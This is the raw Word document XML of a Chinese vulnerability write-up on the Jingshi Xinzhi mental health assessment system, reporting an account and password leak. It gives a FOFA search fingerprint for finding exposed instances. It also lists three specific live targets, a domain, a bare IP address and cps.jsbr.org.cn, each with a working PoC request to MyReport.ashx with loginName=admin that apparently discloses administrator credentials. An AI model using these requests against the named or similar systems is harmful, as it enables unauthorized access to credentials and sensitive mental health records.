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egoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="20856D"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>京师心智心理健康测评系统-账号密码泄露</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t> 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92E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="宋体" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ofa：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>body="JS/ligerComboBox/ligerTree.js"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="37795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"http://www.fun.hcswsxx.com:85/"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http://www.fun.hcswsxx.com:85/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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Poc：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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://116.177.233.3:8012/FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&amp;loginName=admin" </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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http://116.177.233.3:8012/FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&amp;loginName=admin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fldChar w:fldCharType="end"/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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2307590"/>
            <wp:effectExtent l="0" t="0" r="63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资产二：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"http://116.177.233.3:8012/"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http://116.177.233.3:8012/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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Poc：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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "http://116.177.233.3:8012/FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&amp;loginName=admin" </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/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http://116.177.233.3:8012/FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&amp;loginName=admin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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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  <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="215836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资产三：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"https://cps.jsbr.org.cn/"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https://cps.jsbr.org.cn/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https://cps.jsbr.org.cn/FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&amp;loginName=admin</w:t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92E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260975" cy="2092325"/>
            <wp:effectExtent l="0" t="0" r="952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Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="24292E"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="F8F8F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4CA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2024-03-20T12:05:36Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>㉨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-20T12:09:42Z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71B51D8C80D14BD8A6B3408F01D07CE3_12</vt:lpwstr>
  </property>
</Properties>
</file>